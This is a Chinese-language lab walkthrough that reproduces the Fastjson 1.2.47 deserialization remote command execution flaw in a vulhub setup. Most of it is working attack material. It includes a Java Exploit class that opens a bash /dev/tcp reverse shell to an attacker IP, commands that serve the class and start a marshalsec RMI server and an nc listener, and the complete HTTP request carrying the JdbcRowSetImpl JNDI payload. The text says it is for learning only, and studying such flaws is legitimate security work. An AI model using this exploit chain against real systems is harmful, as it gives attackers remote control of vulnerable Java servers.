Fastjson 1.2.47 远程命令执行漏洞
0X00-引言
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:
工具:burpsuite marshalsec-0.0.3-SNAPSHOT-all.jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 下文有下载链接
0X02-漏洞描述
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
0X03-漏洞复现
Apache log4j2利用方式和fastjson相似,EXP一样
http://192.168.234.128:8090/
01-EXP编译/开启web服务
EXP:
public class Exploit {
public Exploit(){
try{
// 要执行的命令
String[] commands = {"bash","-c","exec 5<>/dev/tcp/192.168.234.135/12345;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
Exploit e = new Exploit();
}
}
javac Exploit.java #编译
开启web服务
python -m SimpleHTTPServer 666 #python2命令
python -m http.server 666 #python3开启web服务
02-反弹shell
开启RMI服务,监听端口,并制定加载远程类Exploit.class,执行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.234.135:666/#Exploit" 9999
开启监听
nc -lvvp 12345
burp发送POC
注意修改Content-Type
POST / HTTP/1.1
Host: 192.168.234.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 270
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.234.135:999/Exploit.class",
"autoCommit":true
}
}
成功
0X04-工具检测
https://github.com/Maskhe/FastjsonScan
0X05-免责声明
仅供学习参考
0X06-参考
https://vulhub.org/#/environments/fastjson/1.2.47-rce/